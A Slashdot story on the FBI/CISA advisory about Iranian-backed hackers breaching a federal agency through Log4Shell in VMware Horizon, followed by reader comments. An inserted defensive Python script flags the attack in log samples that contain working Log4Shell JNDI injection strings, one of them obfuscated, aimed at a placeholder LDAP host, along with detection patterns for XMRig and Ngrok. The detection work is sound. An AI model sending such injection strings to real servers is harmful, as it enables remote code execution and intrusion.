Iranian Hackers Breached Federal Agency Using Log4Shell Exploit (bleepingcomputer.com)
An anonymous reader quotes a report from BleepingComputer: The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware. The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability. After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency's network.
"In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," the joint advisory reads. The two U.S. federal agencies added that all organizations who haven't yet patched their VMware systems against Log4Shell should assume that they've already been breached and advise them to start hunting for malicious activity within their networks.
CISA warned in June that VMware Horizon and Unified Access Gateway (UAG) servers are still being preyed upon by multiple threat actors, including state-sponsored hacking groups, using Log4Shell exploits. Log4Shell can be exploited remotely to target vulnerable servers exposed to local or Internet access to move laterally across breached networks to access internal systems that store sensitive data.
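As an added, defender-side illustration of the hunting the advisory tells unpatched organizations to start (this is not code from the advisory, BleepingComputer or any commenter): the Python below flags Log4Shell JNDI lookups in constructed Horizon-style access-log lines, including lookups wrapped in nested `${lower:...}` substitutions, and lists processes whose binary is the XMRig miner or the Ngrok proxy the advisory names. The log lines, process snapshot, paths and pool address are all constructed.

```python
import re
# Constructed sample data, not from the advisory: access-log lines from a VMware
# Horizon front end and a process snapshot from one host on the network.
ACCESS_LOG = """\
10.0.0.5 - - [14/Nov/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Nov/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 1834 "-" "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.9 - - [14/Nov/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 1834 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/b}"
10.0.0.6 - - [14/Nov/2022:10:02:00 +0000] "GET /broker/xml HTTP/1.1" 200 512 "-" "VMware-Horizon-Client"
"""
PROCESS_SNAPSHOT = """\
root  1011  /usr/sbin/sshd -D
svc   2234  /tmp/.x/xmrig -o pool.example.invalid:3333
svc   2290  /opt/tools/ngrok tcp 3389
"""
# Combined log format: client IP first; request line and User-Agent are quoted.
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>[^"]*)" \d+ \S+ "[^"]*" "(?P<agent>[^"]*)"')
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Binaries the advisory names: the XMRig miner and the Ngrok reverse proxy.
TOOL_RE = re.compile(r"(?:^|/)(xmrig|ngrok)(?:\s|$)", re.IGNORECASE)

def normalize_lookup(s: str) -> str:
    """Collapse nested lookups such as ${lower:j} or ${::-j} to the bare character."""
    prev = None
    while prev != s:  # repeat until stable; each matching pass strictly shortens s
        prev = s
        s = re.sub(r"\$\{(?:lower|upper):([^{}])\}", r"\1", s, flags=re.I)
        s = re.sub(r"\$\{::-([^{}]*)\}", r"\1", s)
    return s

def find_jndi_requests(log_text: str) -> list:
    """{client, field} for each request with a JNDI lookup in the request line or User-Agent."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("request", "agent"):
            if JNDI_RE.search(normalize_lookup(m.group(field))):
                hits.append({"client": m.group("client"), "field": field})
    return hits

def find_suspicious_processes(snapshot: str) -> list:
    """{pid, tool, cmd} for processes whose binary is xmrig or ngrok."""
    found = []
    for line in snapshot.splitlines():
        parts = line.split(None, 2)  # user, pid, command line
        if len(parts) == 3 and (m := TOOL_RE.search(parts[2])):
            found.append({"pid": parts[1], "tool": m.group(1).lower(), "cmd": parts[2]})
    return found
```

A hit from either function is a starting point for the incident-response steps the advisory describes, not proof of compromise on its own: a request can be blocked upstream and a benign process can share a name with a tool.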
Crypto mining software (Score:2)
Because the first thing I do when penetrating an adversary's intelligence/law enforcement system is to run something that increases the processing load for no good reason and gets them to take a look at it.
Re: Crypto mining software (Score:4, Funny)
That's what makes this story hilarious though. The Iranians were probably not trying to hack the U.S. government. They might not have even realized that's what they did.
It's like finding out someone broke into a bank to graffiti the vault walls.
Someone should be ashamed of themselves... (Score:3)
The article doesn't reveal the identity of the executive branch federal agency, but holy cow, they should be ashamed of themselves!
An exposed VMware server, not properly segmented from the Internet via a firewall, from which a lateral attack could be mounted on an Active Directory domain server? How, in this day and age, did a configuration like that pass muster? What system owner signed off on it? **What government manager is to blame?**
Re:Someone should be ashamed of themselves... (Score:5, Interesting)
It would make sense for there to be a single federal branch InfoSec oversight organization that does basic vulnerability scans against all federal agencies networks accessible through the Internet. However, every federal system is supposed to have an identified system owner and a plan for making/keeping it secure. Contractors are often employed for grunt work (but not always), but ultimately a government employee is responsible for securing the system. A little light shed on individuals who don't live up to their responsibilities might go a long way towards getting things more sanitized. This has got to be pretty embarrassing for someone, but the names appear to have been redacted to protect them in this case.
Re: Someone should be ashamed of themselves... (Score:2)
Security through legislation is not very effective. Lawmakers need to remove themselves from these decisions by handing over authority to an agency.
Re: (Score:2)
Lawmakers (legislative branch) aren't involved in securing executive branch systems, except at the highest policy level (the US legal code). The executive branch has plenty of governance of its own regarding how IT systems are supposed to be protected/operated. Each executive branch agency has supplemental governance. The US federal branch executive agencies have authority and responsibility for securing their IT systems.
Little detail was provided, but perhaps the kindest interpretation is that VMware s
Re: Someone should be ashamed of themselves... (Score:2)
They are in charge of ways and means though, and dictate how projects need to be bid. It's set up to shovel pork into consultants' pockets. The whole approach to government spending needs to be abandoned for security. Put an organization like the NSA in charge and give them the authority to enforce their recommendations.
Re: (Score:2)
?? Congress (legislative branch) approves spending for the executive branch, but doesn't dictate how the money is spent operationally. Executive branch agencies are firmly in charge of how they run themselves, including their IT operations.
The NSA is an executive branch agency itself, and has already been tasked by executive order with protecting federal government computer networks from "cyber-terrorism". On day to day operational issues, each agency has its own IT security function in addition to its IT ope
Re: Someone should be ashamed of themselves... (Score:2)
If Congress doesn't decide how the executive spends its funding, then why doesn't federal funding cover abortion at Planned Parenthood?
Re: (Score:2)
Probably have been. Easy enough to do. The feds that did the scanning might be in the group that isn't going to alert anyone about their vulnerabilities. Future use and all that. Maybe.
Re: (Score:2)
You would be surprised how few people even turn on VCSA backups and expect restores of the appliance to work 100% of the time. Slapping VMware and vSphere on a chunk of nodes attached to a NAS is one thing. Properly administrating it with multiple LUNs/shares with DRS is another. Add onto that doing backups "right" so they can be pulled out and tested.
Re: (Score:2)
Horizon View is their VDI solution. It’s commonly kept open to the internet because it’s a remote access product.
We’re not talking about vcenter or ESXi.
vmware licensing changes and hardware drops (Score:3)
vmware licensing changes and dropping drivers for a lot of hardware.
Really stopped a lot of upgrades.
Re: (Score:2)
I don't understand why people use VMware at all, when there are free alternatives available that work fine.
Re: (Score:2)
Re: (Score:2)
Please list these free alternatives for ESXi Server.
https://www.microsoft.com/en-u... [microsoft.com]
The free version of Hyper-V Server is still at 2019 because MS isn't releasing any more free hypervisor versions of Windows. It's not exactly a winning move to use a product whose end-of-life is already announced. Tangentially, Hyper-V requires a Windows computer to manage unless you're cool doing everything in PowerShell; there's no WebUI for it.
I've played around with some of the other alternatives, and I haven't been able to find a viable alternative, either. Oracle makes me scratch my head as they have
Time to bring back (Score:3)
Neocon Cyber Büllshít (Score:1)
unpatched (Score:2)
Is this the agency that manages Govt CIOs? (Score:2)
Most agency CIOs are Senior Executive Service positions (versus regular Civil Service or Political Appointees.) So the agency that manages Govt CIO workforce/positions got hacked? I don't know whether to laugh or cry over that.